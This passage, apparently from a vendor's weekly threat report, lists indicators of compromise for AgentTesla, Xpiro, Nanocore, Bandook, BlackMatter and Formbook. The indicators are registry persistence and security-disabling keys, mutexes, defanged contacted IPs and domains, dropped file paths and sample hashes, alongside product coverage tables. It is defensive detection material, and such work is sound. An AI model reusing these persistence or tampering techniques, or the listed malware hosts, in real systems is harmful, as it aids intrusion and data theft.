4326fb1eabf2fd7bde99777bc0283746791e7398cacdf575affe537ab33cf16f
433bedd8a7ee7e1585a93cc9076941d3d31c33c602f116e407da8bddd9db9ea6
44317a91b1c813dc8423423cc5a1130e34264f5ab8cc4b35e05da3b7eaacc3f2
483c61bf01f6404f78a83413bf011e0e86c6adae8cce6e1a622ff1ee6e95c1ee
4bb436856e6c78ebac6ef0f48a76fad96268add5dc1583a0e20b986d4532bce4
*See JSON for more IOCs

Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.AgentTesla-9966126-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys | Value Name | Occurrences
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS | | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\OQBAZG7TYHTA203\ATJMVRXU7DWVTQMOVW75 | wNHJwQzhBIRVra53 | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\OQBAZG7TYHTA203 | | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\OQBAZG7TYHTA203\ATJMVRXU7DWVTQMOVW75 | | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\YAPCUBB9WTPSKYCICPURQGTTVZSSZFZV9XZMYAD173 | | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\YAPCUBB9WTPSKYCICPURQGTTVZSSZFZV9XZMYAD173\ZMD1ZDDSRHXRHJRA7YJEA5BX8K4IU8VF0XR178 | | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\TNNOKQEOKS91GA2LCMWPH6IIE51 | | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\TNNOKQEOKS91GA2LCMWPH6IIE51\WZHY5EK0J8ED51 | | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\YAPCUBB9WTPSKYCICPURQGTTVZSSZFZV9XZMYAD173\ZMD1ZDDSRHXRHJRA7YJEA5BX8K4IU8VF0XR178 | m2shbluBdxk2hpHhWEya7LtO7ceN81 | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\WNHJWQZHBIRVRA224 | | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\TNNOKQEOKS91GA2LCMWPH6IIE51\WZHY5EK0J8ED51 | OqbazG7tyhTA228 | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\WNHJWQZHBIRVRA224\B753 | | 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\WNHJWQZHBIRVRA224\B753 | YapCUbb9WtpskyCIcpUrqGtTVZssZFZv9xzmYaD128 | 11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | newApp | 4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | newapp | 4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM | DisableTaskMgr | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM | | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE | DisableSR | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | Registry Key Name | 1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | LanguageList | 1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @C:\Windows\system32\DeviceCenter.dll,-2000 | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | MyyyyZApp | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | services | 1
Mutexes Occurrences
Global\536fbb71-288b-11ed-9660-00151721fd34 1
Global\5c7184b1-288b-11ed-9660-001517bb55ad 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
3[.]93[.]18[.]244 1
3[.]217[.]248[.]28 1
34[.]200[.]207[.]31 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
checkip[.]amazonaws[.]com 3
smtp[.]tetenel[.]com 1
mail[.]orncbbq[.]com 1
smtp[.]ssgtoolz[.]net 1
Files and or directories created Occurrences
%TEMP%\<random, matching '[0-9]{15}'>000_<random GUID>.db 9
%APPDATA%\newapp 4
%APPDATA%\newapp\newapp.exe 4
%APPDATA%\Postbox\profiles.ini 2
%System32%\drivers\etc\hosts 1
%HOMEPATH%\subfolder 1
%HOMEPATH%\subfolder\filename.exe 1
%HOMEPATH%\subfolder\filename.vbs 1
%APPDATA%\services 1
%TEMP%\MyyyyZApp 1
%TEMP%\MyyyyZApp\MyyyyZApp.exe 1
%APPDATA%\jddbt225.sux 1
%APPDATA%\jddbt225.sux.zip 1
%APPDATA%\jddbt225.sux\Firefox 1
%APPDATA%\jddbt225.sux\Firefox\Profiles 1
%APPDATA%\jddbt225.sux\Firefox\Profiles\1lcuq8ab.default 1
%APPDATA%\jddbt225.sux\Firefox\Profiles\1lcuq8ab.default\cookies.sqlite 1
%APPDATA%\hqbkc1l0.fyj 1
%APPDATA%\hqbkc1l0.fyj.zip 1
%APPDATA%\hqbkc1l0.fyj\Firefox 1
%APPDATA%\hqbkc1l0.fyj\Firefox\Profiles 1
%APPDATA%\hqbkc1l0.fyj\Firefox\Profiles\1lcuq8ab.default 1
%APPDATA%\hqbkc1l0.fyj\Firefox\Profiles\1lcuq8ab.default\cookies.sqlite 1
%APPDATA%\services\services.exe 1
%APPDATA%\jntv4ane.ztp 1
*See JSON for more IOCs

File Hashes

02876781ecf3b9c9dfa90f74ef4fb7d6bb60a35a2c09d3895dff3b6d5a1ebb8b 3030ebe65fb01ddf2cbc83340226a872a0a156d8dc3b4a6faaaef651e3d83e1c 3cc3993e6a4ebfc9cb0f9b3b0859d067648d988b77f993aea203ac80179b97d4 5e87c3c6d7b7b6bacb185a11916876fff30634d7f62e4856634b2ee9238618de 671cd596e79c90f7c37085ba263ae4d677edfee99fc3c8306b8ec6d85133e2af 8e433d9d938adaad4c710c6ea1d24aad1689eb96e33d4cc2e81120c9c4d54197 9aa8ef433012e7b4662a4e36dd41df76b5be268f7cc2073a7361467509d5256a 9ffdf9f36b00abef356517cf38d5bf881959ebbf7af9474b1bd3e673db97cd54 b62a36fa9279443fd389580f809b95a37b0de981ec7c4338826e9ee859ce4847 b91c165d0aa38b11ab8dd8d8d00a460b78302c331478cc04b60f98eddecb1356 f8ce5974e752acd2cb2e90690eb86bb5246cc736482cae4578619cc861dcaaf5

Coverage

Product: Protection
Secure Endpoint: This has coverage
Cloudlock: N/A
CWS: This has coverage
Email Security: This has coverage
Network Security: N/A
Stealthwatch: N/A
Stealthwatch Cloud: N/A
Secure Malware Analytics: This has coverage
Umbrella: N/A
WSA: N/A

Screenshots of Detection

Secure Endpoint: screenshot not reproduced

Secure Malware Analytics: screenshot not reproduced

MITRE ATT&CK: screenshot not reproduced

Win.Virus.Xpiro-9965977-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 45 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: Start) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: Start) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32 (Value Name: Type) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64 (Value Name: Type) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32 (Value Name: Type) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32 (Value Name: Start) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE (Value Name: Type) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE (Value Name: Start) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE (Value Name: Type) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE (Value Name: Start) 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 (Value Name: EnableNotifications) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32 (Value Name: Start) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64 (Value Name: Start) 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER\CLIENT 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER\CLIENT\DB-LIB 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER\CLIENT\SUPERSOCKETNETLIB 45
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE (Value Name: AccumulatedWaitIdleTime) 45
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE (Value Name: RootstoreDirty) 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE (Value Name: AccumulatedWaitIdleTime) 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE (Value Name: RootstoreDirty) 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER\CLIENT\SUPERSOCKETNETLIB (Value Name: Encrypt) 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER\CLIENT (Value Name: SharedMemoryOn) 45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64 (Value Name: Type) 44
Mutexes Occurrences
kkq-vx_mtx62 45
kkq-vx_mtx63 45
kkq-vx_mtx64 45
kkq-vx_mtx65 45
kkq-vx_mtx66 45
kkq-vx_mtx67 45
kkq-vx_mtx68 45
kkq-vx_mtx69 45
kkq-vx_mtx70 45
kkq-vx_mtx71 45
kkq-vx_mtx72 45
kkq-vx_mtx73 45
kkq-vx_mtx74 45
kkq-vx_mtx75 45
kkq-vx_mtx76 45
kkq-vx_mtx77 45
kkq-vx_mtx78 45
kkq-vx_mtx79 45
kkq-vx_mtx80 45
kkq-vx_mtx81 45
kkq-vx_mtx82 45
kkq-vx_mtx83 45
kkq-vx_mtx84 45
kkq-vx_mtx85 45
kkq-vx_mtx86 45
*See JSON for more IOCs
Files and or directories created Occurrences
%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 45
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 45
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 45
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 45
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 45
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 45
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 45
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 45
%System32%\alg.exe 45
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log 45
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log 45
%SystemRoot%\SysWOW64\svchost.exe 45
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log 45
%SystemRoot%\SysWOW64\svchost.vir 45
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat 45
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock 45
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat 45
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.lock 45
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngenservicelock.dat 45
%CommonProgramFiles(x86)%\microsoft shared\source engine\ose.vir 45
%ProgramFiles(x86)%\microsoft office\office14\groove.vir 45
%ProgramFiles(x86)%\mozilla maintenance service\maintenanceservice.vir 45
%CommonProgramFiles%\microsoft shared\officesoftwareprotectionplatform\osppsvc.vir 45
%SystemRoot%\microsoft.net\framework64\v2.0.50727\mscorsvw.vir 45
%SystemRoot%\microsoft.net\framework64\v4.0.30319\mscorsvw.vir 45
*See JSON for more IOCs

File Hashes

07883b2bec4bb5804938dec4b37619c77ad9fc925b52bdd4368faa9416afdbf2 118989bae4bc156627ed91ecc03e9a9a01635f624b00dad94c801ba95da08130 127b5c9fee91c095376a75ee583bc452c269735a94a9381bd262c5cfd2163deb 150587b20269ad5520861cd61fd6eeceddd61e5e05ff27de39189542e1f6f45a 171d6d2f93370d7afd1875a1f7d0a59aef5d46a7d553df98d12855cca5d437a6 1bcb487b3582e158e38e1d76365254022f18a3033c9ca23b5da0c964ead1147a 1d2f153a4f58438ad61950c4468b95358d5aab9356f138d7b74dcadec2afdae1 22ccda550e90cbdc7b115fc3b2d082190df9935b01ea1d8c3923445c759aa477 270a4deb05747829e8a95f5718214bce934ab251f204d1828e3d2a1201caab1d 2817d1aa30164faad40ff66eea5743106219fe83b20ae96523be7691ffbf467b 2b89cd04def8bda3701849a58ebca23151b94b98db25351c7b98d0228d021db7 2d8fcc7e70b0b9721164bf886c297355030b7c7af7904898c96757c522fe051c 2ffe5d618f015af6681482a2347ccb631eb7df646d2d619c38fdb5fc70786ae3 3d61c2d8682ba543026d4a1afa98409938bc28fd09aa327e1058c8abbf9d44b8 3f11dec1f3cd0e3ef1fe0249d656394c2053ae2dd834328d82a7a5b8e7c75a88 44515f7babd049693c6941b93b09f39944caf9038e0216ecf3cdd5ec2a02bb19 4683415d7ef8a0aff6a2cba601d70a150391e59dd8dd4cdb71c6024bfffd9fd5 515cf18bdd0820d02b2233b2ff897e3e957db3d90c9b977ab3480dc4360bb749 537eb171bbe2059013f3b5335724a5da631085ca038e0e1c9082c352e9373d0f 565d18219289992baa30b55dc7d41f0eb74bd557c47305d80257aab8f2dd43f9 5de1d780d6bb9e646e53613cd36bede221b8fd79f2ebe461c075eb1c29fa596b 6e92ff9fc26469a4ab8d7e380a54192d9f3d9a8c7022797053734594b5ebfbc8 73505bcbd55074beee93cc69877a5c6fa1a52b21ef59c9935292daa776e79563 761445a4c924c9575115b2df05a6340b213b88ce4433ef81d0758ee5b794e42d 76f07678f7860611016dd78352f83e636be8686ec312ec869fc4a170249bb93a
*See JSON for more IOCs

Coverage

Product: Protection
Secure Endpoint: This has coverage
Cloudlock: N/A
CWS: This has coverage
Email Security: This has coverage
Network Security: N/A
Stealthwatch: N/A
Stealthwatch Cloud: N/A
Secure Malware Analytics: This has coverage
Umbrella: N/A
WSA: N/A

Screenshots of Detection

Secure Endpoint: screenshot not reproduced

Secure Malware Analytics: screenshot not reproduced

MITRE ATT&CK: screenshot not reproduced

Win.Dropper.Nanocore-9965501-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Firefox) 6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Google Chrome) 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Rauzvon) 2
Mutexes Occurrences
Global\{507a688d-5e7f-4ee3-978d-22cfb8649ae5} 6
IuRNZvTk9FliRK7fos 3
85af4115-b1eb-4cf2-a465-c0c97232a10e 2
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
208[.]95[.]112[.]1 3
194[.]233[.]95[.]52 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
maniac[.]http80[.]info 6
ip-api[.]com 3
zub[.]http80[.]info 3
salak[.]pw 2
methodist[.]sch[.]id 1
Files and or directories created Occurrences
%TEMP%\subfolder 9
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 6
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 6
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 6
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 6
%TEMP%\subfolder\firefox.exe 6
%TEMP%\subfolder\firefox.vbs 6
%APPDATA%\Logs 3
%APPDATA%\Logs\08-27-2022 3
%TEMP%\subfolder\chromee.exe 3
%TEMP%\subfolder\chromee.vbs 3
%TEMP%\Rezmac 2
%TEMP%\Rezmac\reuzcms.exe 2
%TEMP%\Rezmac\reuzcms.vbs 2

File Hashes

18402b2ca4fc7f307ac6df1c12224af6233b42e157d048524ff02eabc5574b3a 2ae13d3cf6ee39ceac1add91e50c25860fa9bc2a9768f1cc5e623211659b14f2 2f9bd77b89fd409ab141f02853f28979675cc109a5b0841476d23b046ffd1a1e 2fc799408a67dc0a572a65bb27b2390731a64984f60409ce054469e2a7a6a46b 374f83f762b8894f5cf1b48334e4ca74ba0664d39f0367e80e3065b138fc9643 83ed0a21ba22c6c5029a5c4d7bc520a6c01665a34d5a085baeb14299d2fb611e 8f1cf8c17179a49c27b10c2ab14b47a2f97b24dcf51483349138a2eb7e10be20 969401a830e00003b591c0123c7ded0e52ceb274b31714fb199bb1ed155a4e67 a51a1959e27231e0cfbecc2dae8144a3ddbca1721bafc8a4ff09e3dd2a6f65e2 ba08670b6879155fa420eed444e3835d2d5fa94061e87d5c27a0b0eaf8a1c847 d4624f001b7c6081a9fe97fa1385cb6ff0f78adeeb9408a4ac0bc26dd2e3925c eac6474104a6ccaa562bc3de90adaf756c236fcc19e3d9db96047c269f664cce

Coverage

Product: Protection
Secure Endpoint: This has coverage
Cloudlock: N/A
CWS: This has coverage
Email Security: This has coverage
Network Security: This has coverage
Stealthwatch: N/A
Stealthwatch Cloud: N/A
Secure Malware Analytics: This has coverage
Umbrella: This has coverage
WSA: This has coverage

Screenshots of Detection

Secure Endpoint: screenshot not reproduced

Secure Malware Analytics: screenshot not reproduced

MITRE ATT&CK: screenshot not reproduced

Win.Packed.Bandook-9965180-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION (Value Name: SysHelper) 14
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E (Value Name: LanguageList) 14
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: SysHelper) 14
Mutexes Occurrences
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 14
Global\<random guid> 12
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
162[.]0[.]217[.]254 14
149[.]154[.]167[.]99 12
116[.]202[.]178[.]78 11
211[.]53[.]230[.]67 5
116[.]121[.]62[.]237 3
109[.]102[.]255[.]230 2
115[.]88[.]24[.]202 2
210[.]182[.]29[.]70 2
186[.]7[.]80[.]197 2
41[.]41[.]255[.]235 1
110[.]14[.]121[.]125 1
222[.]236[.]49[.]124 1
211[.]40[.]39[.]251 1
211[.]171[.]233[.]126 1
190[.]219[.]54[.]242 1
195[.]158[.]3[.]162 1
58[.]235[.]189[.]192 1
187[.]190[.]48[.]135 1
187[.]195[.]212[.]6 1
189[.]164[.]252[.]207 1
88[.]198[.]122[.]116 1
201[.]22[.]188[.]119 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]2ip[.]ua 14
rgyui[.]top 14
acacaca[.]org 14
t[.]me 12
Files and or directories created Occurrences
I:\5d2860c89d774.jpg 14
\SystemID 14
\SystemID\PersonalID.txt 14
%LOCALAPPDATA%\bowsakkdestx.txt 14
%System32%\Tasks\Time Trigger Task 14
%LOCALAPPDATA%\3856b5d6-9eb0-496c-b0d1-db92b0f6ed65 14
%ProgramData%\freebl3.dll 12
%ProgramData%\mozglue.dll 12
%ProgramData%\msvcp140.dll 12
%ProgramData%\nss3.dll 12
%ProgramData%\softokn3.dll 12
%ProgramData%\vcruntime140.dll 12
%LOCALAPPDATA%\7c34bb01-5d78-49c4-8bbb-73fdc7aa1262 12
%LOCALAPPDATA%\7c34bb01-5d78-49c4-8bbb-73fdc7aa1262\build2.exe 11
%LOCALAPPDATA%\66848c81-aae5-4fb7-b7d5-caf7cfaf5685\build2.exe 2
%ProgramData%\38004316577355091428719705 2
%ProgramData%\38004316577355091428719705-shm 2
%ProgramData%\38004316577355091428719705-wal 2
%ProgramData%\71584480118905964190690196 1
%LOCALAPPDATA%\3856b5d6-9eb0-496c-b0d1-db92b0f6ed65\e06bf2d61685bb0e8d57d45e278c965ea7a4fda6e9eae6a8ef9dea226f089dcd.exe 1
%ProgramData%\74266566668491997434247038 1
%ProgramData%\08802376146419947648049053 1
%ProgramData%\78905701483251681848013193 1
%ProgramData%\87138039098365190229474947 1
%ProgramData%\11794213916832836750166526 1
*See JSON for more IOCs

File Hashes

01983ca201f706146be28b5533ee7d96bdf48dcb27e49859366ccb2c8ad86447 0ad916703820d701658f7a8979bad219b7785517a4d3756e9cd7f45018c88f2a 56cd4a53bf45294705a27acc356f8bc2621d48e902ef6ebc739622ae6f93ca6d 5aceb15695c7bb34d473ad77b0bd26e3c63d1b76e3ad4e9bdd5c790e16daf27a 649c98faeafe332823d7c78c2cad20f00f3e23ea85bfccc744a8ea003b58db07 71c7d15d6d1ec0964b2b5a53ff9c71377978e00b297dceb6d958d10a9d2c30a0 79e53831488d7cf38bb7d23afa49a79ff5ec83003dc5b7d061b25689af111a47 84fad9f56332fd8d21e6a4aa6e73b168a02603a8329fa084f11496484f1aeedb 8c61ec9a90c74ae499c8d62d81478addbed60084b54fdb7873edbd3fd604c3d0 a4c1acf7975cb9fa1e3c191dd6f644159e24008929d54b1fbf716523ad06508e afc2efd52b6d261df9f8e6f45a80480f6873281980ce5accc3b64cd00b630727 c31c18f761d14cbaaff14a15cb1c15937c9d9a9910f1db2823e8b89b1fbc14e3 c3f9b1f639069bea05ced05cb4971720f6ae0bdca58ac1d3be31829513ce4d58 e06bf2d61685bb0e8d57d45e278c965ea7a4fda6e9eae6a8ef9dea226f089dcd

Coverage

Product: Protection
Secure Endpoint: This has coverage
Cloudlock: N/A
CWS: This has coverage
Email Security: This has coverage
Network Security: This has coverage
Stealthwatch: N/A
Stealthwatch Cloud: N/A
Secure Malware Analytics: This has coverage
Umbrella: This has coverage
WSA: This has coverage

Screenshots of Detection

Secure Endpoint: screenshot not reproduced

Secure Malware Analytics: screenshot not reproduced

MITRE ATT&CK: screenshot not reproduced

Win.Ransomware.BlackMatter-9965914-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS (Value Name: DeleteFlag) 17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS (Value Name: Start) 17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER (Value Name: GlobalAssocChangedCounter) 16
Mutexes Occurrences
Local\SHResolveLibrary:C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Libraries/Music.library-ms 2
Global\160e9ee717cce91f13d77a3a825f0c36 2
Global\97dd24c9bf8e7c0cbf96f37f87229698 1
Global\d33eaa6f804fb26ad354969330593cc2 1
Global\87157f060adf9f831ce0dc0cb3f23616 1
Global\894f56e5131f56d3248c4e688de24b70 1
Global\e3bb7e34789420de468428f3c22d9d74 1
Global\21cb1589097551b53e4b6dd91c431ec7 1
Global\1bb52c4380360c6c5ede0e9633f41905 1
Global\286849ac1f88a55fdd83f9a2fd92cc8c 1
Global\911dfc525e2ca360ae05fdde5aa84df4 1
Global\64b3e687a1e5d07fe5e0c7a162866a7b 1
Global\ca37097bb37bda10e9e84e42619ea25e 1
Global\f95807e1444ab674c068082d2b3a4883 1
Global\9a70b72fa75e9f9c3e2497457d332c26 1
Global\ea05f6895900370af4c4072c97ed86a2 1
Global\00348b0aaf40155607fc2b57eb660ea0 1
Files and or directories created Occurrences
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-1002\desktop.ini 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I08BO8F.xlsx 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I11KHR4.doc 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I5QKHLN.doc 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I62TWBD.ppt 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I6FZORX.doc 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IABMX83.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IAJ2Y6R.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IALGTCS.xlsx 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IAPSNOM.tsv 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IGORSF7.xsn 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IGTBBSA.accdb 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IH49RPF.ppt 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IH71GGR.ppt 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJKODPH.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJP965K.accdb 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IKY5R3M.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IMYCSIT.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ISLP722.doc 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXLC77A.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXUL2U1.doc 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IYSR1FU.ppt 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IZ2GMJW.XLSX 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R08BO8F.xlsx 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R11KHR4.doc 17
*See JSON for more IOCs

File Hashes

00d3f19ff84cddc5b0cfc9d9b053a99b493add5a9bf8ec74659ef9b3d9298de6 0400ee8269aba8f79bfd0c65f64689b06febae22a7535c9fda728a7eaa29ae0d 060bd55768e0edc037651bf50c54248e9451d57d4da795b9d8ea03829085cea1 0bfd5fbf610b76c84abbdefcdaee8c0d09c002e40f69fe86db39478931aea73a 15f56da9d9888fbad8bc428b72b4d06c736b38392ff41b94ae06c27864a9dee1 2e641dbe994f931adeff6b65fb9db481a42717454a0ea6b1e2222ba24d890fa9 333f19529de011757c299888e57b8d37801b6adbf7e2d270b71726150aeef90c 4707b114756307df755bbe231a468d02503d82947d32f9037d011075d826445e 55b45145bf1ed50d1e72c74c0743ce36e279a10e55dada004824f3eb7db5646d 80e9ee47dafde64d31cf494ecea11923f5b1646d5e8bc9d7e51999bd79334db5 95ddbeacd79ad7d944e75f55ca323a13076b756c4accefd28e206a76b3ea268b 9c25081891c1c1ff09c6bde2e8a9bed6022d6cc9edda9abdd7a771f68264bce6 a24db7475958186ec57258d44edd465b1a060b52aff714e7f261cce41d052deb a6f7f973e63f3c2ef886a98663bd4aa08deb3ec9a4a8c60ead43ce5a9b9787f5 e4eda1e494929b5bf8a5affbbe56d8fa89e4868042cf844c9124d58c9094d77b e5bb89bea6c854818b9b5884bf9e46e51873ccba73e73ef61ff2e63def151ce0 fe20b163358d90a39f3afc632dedd029231428474dd42c71a333b2a6d514f1e8

Coverage

Product: Protection
Secure Endpoint: This has coverage
Cloudlock: N/A
CWS: This has coverage
Email Security: This has coverage
Network Security: N/A
Stealthwatch: N/A
Stealthwatch Cloud: N/A
Secure Malware Analytics: This has coverage
Umbrella: N/A
WSA: N/A

Screenshots of Detection

Secure Endpoint: screenshot not reproduced

Secure Malware Analytics: screenshot not reproduced

MITRE ATT&CK: screenshot not reproduced

Win.Dropper.Formbook-9965920-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Mutexes Occurrences
8-3503835SZBFHHZ 1
S-1-5-21-2580483-1244278791147 1
3Q694U0B59Bv9yz0 1
Files and or directories created Occurrences
